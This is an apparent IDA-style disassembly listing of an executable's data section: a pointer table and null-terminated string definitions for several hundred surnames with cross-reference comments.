dd offset aPettibone ; "Pettibone"
dd offset aPettit ; "Pettit"
dd offset aPfister ; "Pfister"
dd offset aPilbeam ; "Pilbeam"
dd offset aPinot ; "Pinot"
dd offset aPlancon ; "Plancon"
dd offset aPlant ; "Plant"
dd offset aPlasket ; "Plasket"
dd offset aPlous ; "Plous"
dd offset aPo ; "Po"
dd offset aPocobene ; "Pocobene"
dd offset aPoincaire ; "Poincaire"
dd offset aPointer ; "Pointer"
dd offset aPoirier ; "Poirier"
dd offset aPolak ; "Polak"
dd offset aPolanyi ; "Polanyi"
dd offset aPolitis ; "Politis"
dd offset aPoma ; "Poma"
dd offset aPoolman ; "Poolman"
dd offset aPowers ; "Powers"
dd offset aPresper ; "Presper"
dd offset aPreucel ; "Preucel"
dd offset aPrevost ; "Prevost"
dd offset aPritchard ; "Pritchard"
dd offset aPritz ; "Pritz"
dd offset aProietti ; "Proietti"
dd offset aProthrowStith ; "Prothrow-Stith"
dd offset aPuccia ; "Puccia"
dd offset aPugh ; "Pugh"
dd offset aPynchon ; "Pynchon"
dd offset aQuaday ; "Quaday"
dd offset aQuetin ; "Quetin"
dd offset aRabe ; "Rabe"
dd offset aRabkin ; "Rabkin"
dd offset aRadeke ; "Radeke"
dd offset aRajagopalan ; "Rajagopalan"
dd offset aRaney ; "Raney"
dd offset aRangan ; "Rangan"
dd offset aRankin ; "Rankin"
dd offset aRapple ; "Rapple"
dd offset aRayport ; "Rayport"
dd offset aReddenTyler ; "Redden-Tyler"
dd offset aReedquist ; "Reedquist"
dd offset aCunningham ; "Cunningham"
dd offset aReinold ; "Reinold"
dd offset aRemak ; "Remak"
dd offset aRenick ; "Renick"
dd offset aRepetto ; "Repetto"
dd offset aResnik ; "Resnik"
dd offset aRhea ; "Rhea"
dd offset aRichmond ; "Richmond"
dd offset aRielly ; "Rielly"
dd offset aRindos ; "Rindos"
dd offset aRineer ; "Rineer"
dd offset aRish ; "Rish"
dd offset aRivera ; "Rivera"
dd offset aRobinson ; "Robinson"
dd offset aRocha ; "Rocha"
dd offset aRoesler ; "Roesler"
dd offset aRogers ; "Rogers"
dd offset aRonen ; "Ronen"
dd offset aRow ; "Row"
dd offset aRoyal ; "Royal"
dd offset aRu ; "Ru"
dd offset aRuan ; "Ruan"
dd offset aRuderman ; "Ruderman"
dd offset aRuescher ; "Ruescher"
dd offset aRush ; "Rush"
dd offset aRyu ; "Ryu"
dd offset aSabatello ; "Sabatello"
dd offset aSadler ; "Sadler"
dd offset aSafire ; "Safire"
dd offset aSahu ; "Sahu"
dd offset aSali ; "Sali"
dd offset aSamson ; "Samson"
dd offset aSanchezRamirez ; "Sanchez-Ramirez"
dd offset aSanna ; "Sanna"
dd offset aSapers ; "Sapers"
dd offset aSarin ; "Sarin"
dd offset aSartore ; "Sartore"
dd offset aSase ; "Sase"
dd offset aSatin ; "Satin"
dd offset aSatta ; "Satta"
dd offset aSatterthwaite ; "Satterthwaite"
dd offset aSawtell ; "Sawtell"
dd offset aSayied ; "Sayied"
dd offset aScarponi ; "Scarponi"
dd offset aScepan ; "Scepan"
dd offset aScharf ; "Scharf"
dd offset aScharlemann ; "Scharlemann"
dd offset aScheiner ; "Scheiner"
dd offset aSchiano ; "Schiano"
dd offset aSchifini ; "Schifini"
dd offset aSchilling ; "Schilling"
dd offset aSchmitt ; "Schmitt"
dd offset aSchossberger ; "Schossberger"
dd offset aSchuman ; "Schuman"
dd offset aSchutte ; "Schutte"
dd offset aSchuyler ; "Schuyler"
dd offset aSchwan ; "Schwan"
dd offset aSchwickrath ; "Schwickrath"
dd offset aScovel ; "Scovel"
dd offset aScudder ; "Scudder"
dd offset aSeaton ; "Seaton"
dd offset aSeeber ; "Seeber"
dd offset aSegal ; "Segal"
dd offset aSekler ; "Sekler"
dd offset aSelvage ; "Selvage"
dd offset aSen ; "Sen"
dd offset aSennett ; "Sennett"
dd offset aSeterdahl ; "Seterdahl"
dd offset aSexton ; "Sexton"
dd offset aSeyfert ; "Seyfert"
dd offset aShaikh ; "Shaikh"
dd offset aShakis ; "Shakis"
dd offset aShankland ; "Shankland"
dd offset aShanley ; "Shanley"
dd offset aShar ; "Shar"
dd offset aShatrov ; "Shatrov"
dd offset aShavelson ; "Shavelson"
dd offset aShea ; "Shea"
dd offset aSheats ; "Sheats"
dd offset aShepherd ; "Shepherd"
dd offset aSheppard ; "Sheppard"
dd offset aShepstone ; "Shepstone"
dd offset aShesko ; "Shesko"
dd offset aShia ; "Shia"
dd offset aShibata ; "Shibata"
dd offset aShimon ; "Shimon"
dd offset aSiesto ; "Siesto"
dd offset aSigalot ; "Sigalot"
dd offset aSigini ; "Sigini"
dd offset aSigna ; "Signa"
dd offset aSilverman ; "Silverman"
dd offset aSilvetti ; "Silvetti"
dd offset aSinsabaugh ; "Sinsabaugh"
dd offset aSirilli ; "Sirilli"
dd offset aSites ; "Sites"
dd offset aSkane ; "Skane"
dd offset aSkerry ; "Skerry"
dd offset aSkoda ; "Skoda"
dd offset aSloan ; "Sloan"
dd offset aSlowe ; "Slowe"
dd offset aSmilow ; "Smilow"
dd offset aSniffen ; "Sniffen"
dd offset aSnodgrass ; "Snodgrass"
dd offset aSocolow ; "Socolow"
dd offset aSolon ; "Solon"
dd offset aSomers ; "Somers"
dd offset aSommariva ; "Sommariva"
dd offset aSorabella ; "Sorabella"
dd offset aSorg ; "Sorg"
dd offset aSottak ; "Sottak"
dd offset aSoukup ; "Soukup"
dd offset aSoule ; "Soule"
dd offset aSoultanian ; "Soultanian"
dd offset aSpanier ; "Spanier"
dd offset aSparrow ; "Sparrow"
dd offset aSpaulding ; "Spaulding"
dd offset aSpeizer ; "Speizer"
dd offset aSpence ; "Spence"
dd offset aSperber ; "Sperber"
dd offset aSpicer ; "Spicer"
dd offset aSpiegelhalter ; "Spiegelhalter"
dd offset aSpiliotis ; "Spiliotis"
dd offset aSpinrad ; "Spinrad"
dd offset aStmartin ; "StMartin"
dd offset aStalvey ; "Stalvey"
off_445344 dd offset aStam ; DATA XREF: .data:004549E8�o
; .data:00454DA4�o
; "Stam"
dd offset aStang ; "Stang"
dd offset aStassinopolus ; "Stassinopolus"
dd offset aStates ; "States"
dd offset aStatlender ; "Statlender"
dd offset aStefani ; "Stefani"
dd offset aSteiner ; "Steiner"
dd offset aStephanian ; "Stephanian"
dd offset aStepniewska ; "Stepniewska"
dd offset aStewartOaten ; "Stewart-Oaten"
dd offset aStiepock ; "Stiepock"
dd offset aStillwell ; "Stillwell"
dd offset aStock ; "Stock"
dd offset aStockton ; "Stockton"
dd offset aStockwell ; "Stockwell"
dd offset aStolzenberg ; "Stolzenberg"
dd offset aStonich ; "Stonich"
dd offset aStorer ; "Storer"
dd offset aStott ; "Stott"
dd offset aStrange ; "Strange"
dd offset aStrauch ; "Strauch"
dd offset aStreiff ; "Streiff"
dd offset aStringer ; "Stringer"
dd offset aSullivan ; "Sullivan"
dd offset aSumner ; "Sumner"
dd offset aSuo ; "Suo"
dd offset aSurdam ; "Surdam"
dd offset aSweeting ; "Sweeting"
dd offset aSweetser ; "Sweetser"
dd offset aSwindle ; "Swindle"
dd offset aTagiuri ; "Tagiuri"
dd offset aTai ; "Tai"
dd offset aTalaugon ; "Talaugon"
dd offset aTambiah ; "Tambiah"
dd offset aTandler ; "Tandler"
dd offset aTanowitz ; "Tanowitz"
dd offset aTatar ; "Tatar"
dd offset aTaveras ; "Taveras"
dd offset aTawn ; "Tawn"
dd offset aTcherepnin ; "Tcherepnin"
dd offset aTeague ; "Teague"
dd offset aTemes ; "Temes"
dd offset aTemmer ; "Temmer"
dd offset aTenney ; "Tenney"
dd offset aTerracini ; "Terracini"
dd offset aThan ; "Than"
dd offset aThavaneswaran ; "Thavaneswaran"
dd offset aTheodos ; "Theodos"
dd offset aThibault ; "Thibault"
dd offset aThisted ; "Thisted"
dd offset aThomsen ; "Thomsen"
dd offset aThroop ; "Throop"
dd offset aTierney ; "Tierney"
dd offset aTill ; "Till"
dd offset aTimmons ; "Timmons"
dd offset aTofallis ; "Tofallis"
dd offset aTollestrup ; "Tollestrup"
dd offset aTolls ; "Tolls"
dd offset aTolman ; "Tolman"
dd offset aTomford ; "Tomford"
dd offset aToomer ; "Toomer"
dd offset aTopulos ; "Topulos"
dd offset aTorresi ; "Torresi"
dd offset aTorske ; "Torske"
dd offset aTowler ; "Towler"
dd offset aToye ; "Toye"
dd offset aTraebert ; "Traebert"
dd offset aTrenga ; "Trenga"
dd offset aTrewin ; "Trewin"
dd offset aTringali ; "Tringali"
dd offset aTroiani ; "Troiani"
dd offset aTroy ; "Troy"
dd offset aTruss ; "Truss"
dd offset aTsiatis ; "Tsiatis"
dd offset aTsomides ; "Tsomides"
dd offset aTsukurov ; "Tsukurov"
dd offset aTuck ; "Tuck"
dd offset aTudge ; "Tudge"
dd offset aTukan ; "Tukan"
dd offset aTurano ; "Turano"
dd offset aTurek ; "Turek"
dd offset aTuttle ; "Tuttle"
dd offset aTwells ; "Twells"
dd offset aTzamarias ; "Tzamarias"
dd offset aUllman ; "Ullman"
dd offset aUntermeyer ; "Untermeyer"
dd offset aUpsdell ; "Upsdell"
dd offset aUrban ; "Urban"
dd offset aUrdangBrown ; "Urdang-Brown"
dd offset aUsdan ; "Usdan"
dd offset aUzuner ; "Uzuner"
dd offset aVacca ; "Vacca"
dd offset aWaite ; "Waite"
dd offset aValberg ; "Valberg"
dd offset aValencia ; "Valencia"
dd offset aWales ; "Wales"
dd offset aWallenberg ; "Wallenberg"
dd offset aWalter ; "Walter"
dd offset aVanallen ; "vanAllen"
dd offset aVanzwet ; "VanZwet"
dd offset aVandenberg ; "Vandenberg"
dd offset aVanheeckeren ; "Vanheeckeren"
dd offset aWarshafsky ; "Warshafsky"
dd offset aWasowska ; "Wasowska"
dd offset aVasquez ; "Vasquez"
dd offset aWaugh ; "Waugh"
dd offset aWeighart ; "Weighart"
dd offset aWeingarten ; "Weingarten"
dd offset aWeinhaus ; "Weinhaus"
dd offset aWeissbourd ; "Weissbourd"
dd offset aWeissman ; "Weissman"
dd offset aVelasquez ; "Velasquez"
dd offset aWelles ; "Welles"
dd offset aWelsh ; "Welsh"
dd offset aWengret ; "Wengret"
dd offset aVenne ; "Venne"
dd offset aVerghese ; "Verghese"
dd offset aWescott ; "Wescott"
dd offset aWetzel ; "Wetzel"
dd offset aWhately ; "Whately"
dd offset aWhilton ; "Whilton"
dd offset aWhite ; "White"
dd offset aWhitla ; "Whitla"
dd offset aWhittaker ; "Whittaker"
dd offset aViana ; "Viana"
dd offset aViano ; "Viano"
dd offset aWiedersheim ; "Wiedersheim"
dd offset aWiener ; "Wiener"
dd offset aViens ; "Viens"
dd offset aVignola ; "Vignola"
dd offset aWilder ; "Wilder"
dd offset aWilhelm ; "Wilhelm"
dd offset aWilk ; "Wilk"
dd offset aWilkin ; "Wilkin"
dd offset aWilkinson ; "Wilkinson"
dd offset aVillarreal ; "Villarreal"
dd offset aWillstatter ; "Willstatter"
dd offset aWilson ; "Wilson"
dd offset aVitali ; "Vitali"
dd offset aViviani ; "Viviani"
dd offset aVoigt ; "Voigt"
dd offset aWolk ; "Wolk"
dd offset aVonhoffman ; "VonHoffman"
dd offset aWoo ; "Woo"
dd offset aWooden ; "Wooden"
dd offset aWoods ; "Woods"
dd offset aWoodsPowell ; "Woods-Powell"
dd offset aVorhaus ; "Vorhaus"
dd offset aVotey ; "Votey"
dd offset aYacono ; "Yacono"
dd offset aYamane ; "Yamane"
dd offset aYankee ; "Yankee"
dd offset aYarchuk ; "Yarchuk"
dd offset aYates ; "Yates"
dd offset aYbarra ; "Ybarra"
dd offset aYedidia ; "Yedidia"
dd offset aYesson ; "Yesson"
dd offset aYetiv ; "Yetiv"
dd offset aYoffe ; "Yoffe"
dd offset aYoo ; "Yoo"
dd offset aYoukSee ; "Youk-See"
dd offset aYu ; "Yu"
dd offset aZachary ; "Zachary"
dd offset aZahedi ; "Zahedi"
dd offset aZangwill ; "Zangwill"
dd offset aZegans ; "Zegans"
dd offset aZerbini ; "Zerbini"
dd offset aZoldak ; "Zoldak"
dd offset aZucconi ; "Zucconi"
dd offset aZurn ; "Zurn"
dd offset aZwiers ; "Zwiers"
dd offset aZytowski ; "Zytowski"
aAbdulrazak db 'Abdulrazak',0 ; DATA XREF: .data:off_4443B8�o
align 10h
aAckerman db 'Ackerman',0 ; DATA XREF: .data:004443BC�o
align 4
aAdams db 'Adams',0 ; DATA XREF: .data:004443C0�o
align 4
aAddison db 'Addison',0 ; DATA XREF: .data:off_4443C4�o
aAdelstein db 'Adelstein',0 ; DATA XREF: .data:004443C8�o
align 4
aAdibe db 'Adibe',0 ; DATA XREF: .data:004443CC�o
align 10h
aAdorno db 'Adorno',0 ; DATA XREF: .data:004443D0�o
align 4
aAhlers db 'Ahlers',0 ; DATA XREF: .data:004443D4�o
align 10h
aAlavi db 'Alavi',0 ; DATA XREF: .data:004443D8�o
align 4
aAlcorn db 'Alcorn',0 ; DATA XREF: .data:004443DC�o
align 10h
aAlda db 'Alda',0 ; DATA XREF: .data:004443E0�o
align 4
aAleks db 'Aleks',0 ; DATA XREF: .data:004443E4�o
align 10h
aAllison db 'Allison',0 ; DATA XREF: .data:004443E8�o
aAlongi db 'Alongi',0 ; DATA XREF: .data:004443EC�o
align 10h
aAltavilla db 'Altavilla',0 ; DATA XREF: .data:004443F0�o
align 4
aAltenberger db 'Altenberger',0 ; DATA XREF: .data:004443F4�o
aAltenhofen db 'Altenhofen',0 ; DATA XREF: .data:004443F8�o
align 4
aAmaral db 'Amaral',0 ; DATA XREF: .data:004443FC�o
align 4
aAmatangelo db 'Amatangelo',0 ; DATA XREF: .data:00444400�o
align 4
aAmeer db 'Ameer',0 ; DATA XREF: .data:00444404�o
align 10h
aAmsden db 'Amsden',0 ; DATA XREF: .data:00444408�o
align 4
aAnand db 'Anand',0 ; DATA XREF: .data:0044440C�o
align 10h
aAndel db 'Andel',0 ; DATA XREF: .data:00444410�o
align 4
aAndo db 'Ando',0 ; DATA XREF: .data:00444414�o
align 10h
aAndrelus db 'Andrelus',0 ; DATA XREF: .data:00444418�o
align 4
aAndron db 'Andron',0 ; DATA XREF: .data:0044441C�o
align 4
aAnfinrud db 'Anfinrud',0 ; DATA XREF: .data:00444420�o
align 10h
aAnsley db 'Ansley',0 ; DATA XREF: .data:00444424�o
align 4
aAnthony db 'Anthony',0 ; DATA XREF: .data:00444428�o
aAntos db 'Antos',0 ; DATA XREF: .data:0044442C�o
align 4
aArbia db 'Arbia',0 ; DATA XREF: .data:00444430�o
align 10h
aArduini db 'Arduini',0 ; DATA XREF: .data:00444434�o
aArellano db 'Arellano',0 ; DATA XREF: .data:00444438�o
align 4
aAristotle db 'Aristotle',0 ; DATA XREF: .data:0044443C�o
align 10h
aArjas db 'Arjas',0 ; DATA XREF: .data:00444440�o
align 4
aArky db 'Arky',0 ; DATA XREF: .data:00444444�o
align 10h
aAtkins db 'Atkins',0 ; DATA XREF: .data:00444448�o
align 4
aAugustus db 'Augustus',0 ; DATA XREF: .data:0044444C�o
; .data:off_44A5C0�o
align 4
aAurelius db 'Aurelius',0 ; DATA XREF: .data:00444450�o
align 10h
aAxelrod db 'Axelrod',0 ; DATA XREF: .data:00444454�o
aAxworthy db 'Axworthy',0 ; DATA XREF: .data:00444458�o
align 4
aAyiemba db 'Ayiemba',0 ; DATA XREF: .data:0044445C�o
aAykroyd db 'Aykroyd',0 ; DATA XREF: .data:00444460�o
aAyling db 'Ayling',0 ; DATA XREF: .data:00444464�o
align 4
aAzima db 'Azima',0 ; DATA XREF: .data:00444468�o
align 4
aBachmuth db 'Bachmuth',0 ; DATA XREF: .data:0044446C�o
align 10h
aBackus db 'Backus',0 ; DATA XREF: .data:00444470�o
align 4
aBady db 'Bady',0 ; DATA XREF: .data:00444474�o
align 10h
aBaglivo db 'Baglivo',0 ; DATA XREF: .data:00444478�o
aBagnold db 'Bagnold',0 ; DATA XREF: .data:0044447C�o
aBailar db 'Bailar',0 ; DATA XREF: .data:00444480�o
align 4
aBakanowsky db 'Bakanowsky',0 ; DATA XREF: .data:00444484�o
align 4
aBaleja db 'Baleja',0 ; DATA XREF: .data:00444488�o
align 4
aBallatori db 'Ballatori',0 ; DATA XREF: .data:0044448C�o
align 4
aBallew db 'Ballew',0 ; DATA XREF: .data:00444490�o
align 10h
aBaltz db 'Baltz',0 ; DATA XREF: .data:00444494�o
align 4
aBanta db 'Banta',0 ; DATA XREF: .data:00444498�o
align 10h
aBarabesi db 'Barabesi',0 ; DATA XREF: .data:0044449C�o
align 4
aBarajas db 'Barajas',0 ; DATA XREF: .data:004444A0�o
aBaranczak db 'Baranczak',0 ; DATA XREF: .data:004444A4�o
align 10h
aBaranowska db 'Baranowska',0 ; DATA XREF: .data:004444A8�o
align 4
aBarberi db 'Barberi',0 ; DATA XREF: .data:004444AC�o
aBarbetti db 'Barbetti',0 ; DATA XREF: .data:004444B0�o
align 10h
aBarneson db 'Barneson',0 ; DATA XREF: .data:004444B4�o
align 4
aBarnett db 'Barnett',0 ; DATA XREF: .data:004444B8�o
aBarriola db 'Barriola',0 ; DATA XREF: .data:004444BC�o
align 10h
aBarry db 'Barry',0 ; DATA XREF: .data:004444C0�o
align 4
aBartholomew db 'Bartholomew',0 ; DATA XREF: .data:004444C4�o
aBartolome db 'Bartolome',0 ; DATA XREF: .data:004444C8�o
align 10h
aBartoo db 'Bartoo',0 ; DATA XREF: .data:004444CC�o
align 4
aBasavappa db 'Basavappa',0 ; DATA XREF: .data:004444D0�o
align 4
aBashevis db 'Bashevis',0 ; DATA XREF: .data:004444D4�o
align 10h
aBatchelder db 'Batchelder',0 ; DATA XREF: .data:004444D8�o
align 4
aBaumiller db 'Baumiller',0 ; DATA XREF: .data:004444DC�o
align 4
aBayles db 'Bayles',0 ; DATA XREF: .data:004444E0�o
align 10h
aBayo db 'Bayo',0 ; DATA XREF: .data:004444E4�o
align 4
aBeacon db 'Beacon',0 ; DATA XREF: .data:004444E8�o
align 10h
aBeal db 'Beal',0 ; DATA XREF: .data:004444EC�o
align 4
aBean db 'Bean',0 ; DATA XREF: .data:004444F0�o
align 10h
aBeckman db 'Beckman',0 ; DATA XREF: .data:004444F4�o
aBeder db 'Beder',0 ; DATA XREF: .data:004444F8�o
align 10h
aBedford db 'Bedford',0 ; DATA XREF: .data:004444FC�o
aBehenna db 'Behenna',0 ; DATA XREF: .data:00444500�o
aBelanger db 'Belanger',0 ; DATA XREF: .data:00444504�o
align 4
aBelaoussof db 'Belaoussof',0 ; DATA XREF: .data:00444508�o
align 4
aBelfer db 'Belfer',0 ; DATA XREF: .data:0044450C�o
align 10h
aBelinCollart db 'Belin-Collart',0 ; DATA XREF: .data:00444510�o
align 10h
aBellavance db 'Bellavance',0 ; DATA XREF: .data:00444514�o
align 4
aBellhouse db 'Bellhouse',0 ; DATA XREF: .data:00444518�o
align 4
aBellini db 'Bellini',0 ; DATA XREF: .data:0044451C�o
aBelloc db 'Belloc',0 ; DATA XREF: .data:00444520�o
align 4
aBenedictDye db 'Benedict-Dye',0 ; DATA XREF: .data:00444524�o
align 4
aBergson db 'Bergson',0 ; DATA XREF: .data:00444528�o
aBerkeJenkins db 'Berke-Jenkins',0 ; DATA XREF: .data:0044452C�o
align 10h
aBernardo db 'Bernardo',0 ; DATA XREF: .data:00444530�o
align 4
aBernassola db 'Bernassola',0 ; DATA XREF: .data:00444534�o
align 4
aBernston db 'Bernston',0 ; DATA XREF: .data:00444538�o
align 4
aBerrizbeitia db 'Berrizbeitia',0 ; DATA XREF: .data:0044453C�o
align 4
aBetti db 'Betti',0 ; DATA XREF: .data:00444540�o
align 4
aBeynart db 'Beynart',0 ; DATA XREF: .data:00444544�o
aBiagioli db 'Biagioli',0 ; DATA XREF: .data:00444548�o
align 10h
aBickel db 'Bickel',0 ; DATA XREF: .data:0044454C�o
align 4
aBinion db 'Binion',0 ; DATA XREF: .data:00444550�o
align 10h
aBir db 'Bir',0 ; DATA XREF: .data:00444554�o
aBisema db 'Bisema',0 ; DATA XREF: .data:00444558�o
align 4
aBisho db 'Bisho',0 ; DATA XREF: .data:0044455C�o
align 4
aBlackbourn db 'Blackbourn',0 ; DATA XREF: .data:00444560�o
align 10h
aBlackwell db 'Blackwell',0 ; DATA XREF: .data:00444564�o
align 4
aBlagg db 'Blagg',0 ; DATA XREF: .data:00444568�o
align 4
aBlakemore db 'Blakemore',0 ; DATA XREF: .data:0044456C�o
align 10h
aBlanke db 'Blanke',0 ; DATA XREF: .data:00444570�o
align 4
aBliss db 'Bliss',0 ; DATA XREF: .data:00444574�o
align 10h
aBlizard db 'Blizard',0 ; DATA XREF: .data:00444578�o
aBloch db 'Bloch',0 ; DATA XREF: .data:0044457C�o
align 10h
aBloembergen db 'Bloembergen',0 ; DATA XREF: .data:00444580�o
aBloemhof db 'Bloemhof',0 ; DATA XREF: .data:00444584�o
align 4
aBloxham db 'Bloxham',0 ; DATA XREF: .data:00444588�o
aBlyth db 'Blyth',0 ; DATA XREF: .data:0044458C�o
align 4
aBolger db 'Bolger',0 ; DATA XREF: .data:00444590�o
align 10h
aBolick db 'Bolick',0 ; DATA XREF: .data:00444594�o
align 4
aBollinger db 'Bollinger',0 ; DATA XREF: .data:00444598�o
align 4
aBologna db 'Bologna',0 ; DATA XREF: .data:0044459C�o
aBoner db 'Boner',0 ; DATA XREF: .data:004445A0�o
align 4
aBonham db 'Bonham',0 ; DATA XREF: .data:004445A4�o
align 4
aBoniface db 'Boniface',0 ; DATA XREF: .data:004445A8�o
align 4
aBontempo db 'Bontempo',0 ; DATA XREF: .data:004445AC�o
align 4
aBook db 'Book',0 ; DATA XREF: .data:004445B0�o
align 4
aBookbinder db 'Bookbinder',0 ; DATA XREF: .data:004445B4�o
align 4
aBoone db 'Boone',0 ; DATA XREF: .data:004445B8�o
align 10h
aBoorstin db 'Boorstin',0 ; DATA XREF: .data:004445BC�o
align 4
aBorack db 'Borack',0 ; DATA XREF: .data:004445C0�o
align 4
aBorden db 'Borden',0 ; DATA XREF: .data:004445C4�o
align 4
aBossi db 'Bossi',0 ; DATA XREF: .data:004445C8�o
align 4
aBothman db 'Bothman',0 ; DATA XREF: .data:004445CC�o
aBotosh db 'Botosh',0 ; DATA XREF: .data:004445D0�o
align 4
aBoudin db 'Boudin',0 ; DATA XREF: .data:004445D4�o
align 4
aBoudrot db 'Boudrot',0 ; DATA XREF: .data:004445D8�o
aBourneuf db 'Bourneuf',0 ; DATA XREF: .data:004445DC�o
align 10h
aBowers db 'Bowers',0 ; DATA XREF: .data:004445E0�o
align 4
aBoxer db 'Boxer',0 ; DATA XREF: .data:004445E4�o
align 10h
aBoyajian db 'Boyajian',0 ; DATA XREF: .data:004445E8�o
align 4
aBoyes db 'Boyes',0 ; DATA XREF: .data:004445EC�o
align 4
aBoyland db 'Boyland',0 ; DATA XREF: .data:004445F0�o
aBoym db 'Boym',0 ; DATA XREF: .data:004445F4�o
align 4
aBoyne db 'Boyne',0 ; DATA XREF: .data:004445F8�o
align 4
aBracalente db 'Bracalente',0 ; DATA XREF: .data:004445FC�o
align 4
aBradac db 'Bradac',0 ; DATA XREF: .data:00444600�o
align 10h
aBradach db 'Bradach',0 ; DATA XREF: .data:00444604�o
aBrecht db 'Brecht',0 ; DATA XREF: .data:00444608�o
align 10h
aBreed db 'Breed',0 ; DATA XREF: .data:0044460C�o
align 4
aBrenan db 'Brenan',0 ; DATA XREF: .data:00444610�o
align 10h
aBrennan db 'Brennan',0 ; DATA XREF: .data:00444614�o
aBrewer db 'Brewer',0 ; DATA XREF: .data:00444618�o
align 10h
aBrewer_0 db 'Brewer',0 ; DATA XREF: .data:0044461C�o
align 4
aBridgeman db 'Bridgeman',0 ; DATA XREF: .data:00444620�o
align 4
aBridges db 'Bridges',0 ; DATA XREF: .data:00444624�o
aBrinton db 'Brinton',0 ; DATA XREF: .data:00444628�o
aBritz db 'Britz',0 ; DATA XREF: .data:0044462C�o
align 4
aBroca db 'Broca',0 ; DATA XREF: .data:00444630�o
align 4
aBrook db 'Brook',0 ; DATA XREF: .data:00444634�o
align 4
aBrzycki db 'Brzycki',0 ; DATA XREF: .data:00444638�o
aBuchan db 'Buchan',0 ; DATA XREF: .data:0044463C�o
align 4
aBudding db 'Budding',0 ; DATA XREF: .data:00444640�o
aBullard db 'Bullard',0 ; DATA XREF: .data:00444644�o
aBunton db 'Bunton',0 ; DATA XREF: .data:00444648�o
align 4
aBurden db 'Burden',0 ; DATA XREF: .data:0044464C�o
align 4
aBurdzy db 'Burdzy',0 ; DATA XREF: .data:00444650�o
align 4
aBurke db 'Burke',0 ; DATA XREF: .data:00444654�o
align 4
aBurridge db 'Burridge',0 ; DATA XREF: .data:00444658�o
align 4
aBusetta db 'Busetta',0 ; DATA XREF: .data:0044465C�o
aByatt db 'Byatt',0 ; DATA XREF: .data:00444660�o
align 4
aByerly db 'Byerly',0 ; DATA XREF: .data:00444664�o
align 10h
aByrd db 'Byrd',0 ; DATA XREF: .data:00444668�o
align 4
aCage db 'Cage',0 ; DATA XREF: .data:0044466C�o
align 10h
aCalnan db 'Calnan',0 ; DATA XREF: .data:00444670�o
align 4
aCammelli db 'Cammelli',0 ; DATA XREF: .data:00444674�o
align 4
aCammilleri db 'Cammilleri',0 ; DATA XREF: .data:00444678�o
align 10h
aCanley db 'Canley',0 ; DATA XREF: .data:0044467C�o
align 4
aCapanni db 'Capanni',0 ; DATA XREF: .data:00444680�o
aCaperton db 'Caperton',0 ; DATA XREF: .data:00444684�o
align 4
aCapocaccia db 'Capocaccia',0 ; DATA XREF: .data:00444688�o
align 4
aCapodilupo db 'Capodilupo',0 ; DATA XREF: .data:0044468C�o
align 4
aCappuccio db 'Cappuccio',0 ; DATA XREF: .data:00444690�o
align 10h
aCapursi db 'Capursi',0 ; DATA XREF: .data:00444694�o
aCaratozzolo db 'Caratozzolo',0 ; DATA XREF: .data:00444698�o
aCarayannopoulo db 'Carayannopoulos',0 ; DATA XREF: .data:0044469C�o
aCarlin db 'Carlin',0 ; DATA XREF: .data:004446A0�o
align 4
aCarlos db 'Carlos',0 ; DATA XREF: .data:004446A4�o
align 4
aCarlyle db 'Carlyle',0 ; DATA XREF: .data:004446A8�o
aCarmichael db 'Carmichael',0 ; DATA XREF: .data:004446AC�o
align 4
aCaroti db 'Caroti',0 ; DATA XREF: .data:004446B0�o
align 10h
aCarper db 'Carper',0 ; DATA XREF: .data:004446B4�o
align 4
aCartmill db 'Cartmill',0 ; DATA XREF: .data:004446B8�o
align 4
aCascio db 'Cascio',0 ; DATA XREF: .data:004446BC�o
align 4
aCase db 'Case',0 ; DATA XREF: .data:004446C0�o
align 4
aCaspar db 'Caspar',0 ; DATA XREF: .data:004446C4�o
align 4
aCastelda db 'Castelda',0 ; DATA XREF: .data:004446C8�o
align 4
aCavanagh db 'Cavanagh',0 ; DATA XREF: .data:004446CC�o
align 4
aCavell db 'Cavell',0 ; DATA XREF: .data:004446D0�o
align 4
aCeniceros db 'Ceniceros',0 ; DATA XREF: .data:004446D4�o
align 4
aCerioli db 'Cerioli',0 ; DATA XREF: .data:004446D8�o
aChapman db 'Chapman',0 ; DATA XREF: .data:004446DC�o
aCharles db 'Charles',0 ; DATA XREF: .data:004446E0�o
aCheang db 'Cheang',0 ; DATA XREF: .data:004446E4�o
align 4
aCherry db 'Cherry',0 ; DATA XREF: .data:004446E8�o
align 10h
aChervinsky db 'Chervinsky',0 ; DATA XREF: .data:004446EC�o
align 4
aChiassino db 'Chiassino',0 ; DATA XREF: .data:004446F0�o
align 4
aChien db 'Chien',0 ; DATA XREF: .data:004446F4�o
align 10h
aChildress db 'Childress',0 ; DATA XREF: .data:004446F8�o
align 4
aChilds db 'Childs',0 ; DATA XREF: .data:004446FC�o
align 4
aChinipardaz db 'Chinipardaz',0 ; DATA XREF: .data:00444700�o
aChinman db 'Chinman',0 ; DATA XREF: .data:00444704�o
aChristenson db 'Christenson',0 ; DATA XREF: .data:00444708�o
aChristian db 'Christian',0 ; DATA XREF: .data:0044470C�o
align 10h
aChristiano db 'Christiano',0 ; DATA XREF: .data:00444710�o
align 4
aChristie db 'Christie',0 ; DATA XREF: .data:00444714�o
align 4
aChristopher db 'Christopher',0 ; DATA XREF: .data:00444718�o
aChu db 'Chu',0 ; DATA XREF: .data:0044471C�o
aChupasko db 'Chupasko',0 ; DATA XREF: .data:00444720�o
align 4
aChurch db 'Church',0 ; DATA XREF: .data:00444724�o
align 4
aCiampaglia db 'Ciampaglia',0 ; DATA XREF: .data:00444728�o
align 4
aCicero db 'Cicero',0 ; DATA XREF: .data:0044472C�o
align 10h
aCifarelli db 'Cifarelli',0 ; DATA XREF: .data:00444730�o
align 4
aClaffey db 'Claffey',0 ; DATA XREF: .data:00444734�o
aClancy db 'Clancy',0 ; DATA XREF: .data:00444738�o
align 4
aClark db 'Clark',0 ; DATA XREF: .data:0044473C�o
align 4
aClement db 'Clement',0 ; DATA XREF: .data:00444740�o
aClifton db 'Clifton',0 ; DATA XREF: .data:00444744�o
aClow db 'Clow',0 ; DATA XREF: .data:00444748�o
align 4
aCoblenz db 'Coblenz',0 ; DATA XREF: .data:0044474C�o
aCoito db 'Coito',0 ; DATA XREF: .data:00444750�o
align 4
aColdren db 'Coldren',0 ; DATA XREF: .data:00444754�o
aColella db 'Colella',0 ; DATA XREF: .data:00444758�o
aCollard db 'Collard',0 ; DATA XREF: .data:0044475C�o
aCollis db 'Collis',0 ; DATA XREF: .data:00444760�o
align 4
aCompton db 'Compton',0 ; DATA XREF: .data:00444764�o
aCompton_0 db 'Compton',0 ; DATA XREF: .data:00444768�o
aComstock db 'Comstock',0 ; DATA XREF: .data:0044476C�o
align 4
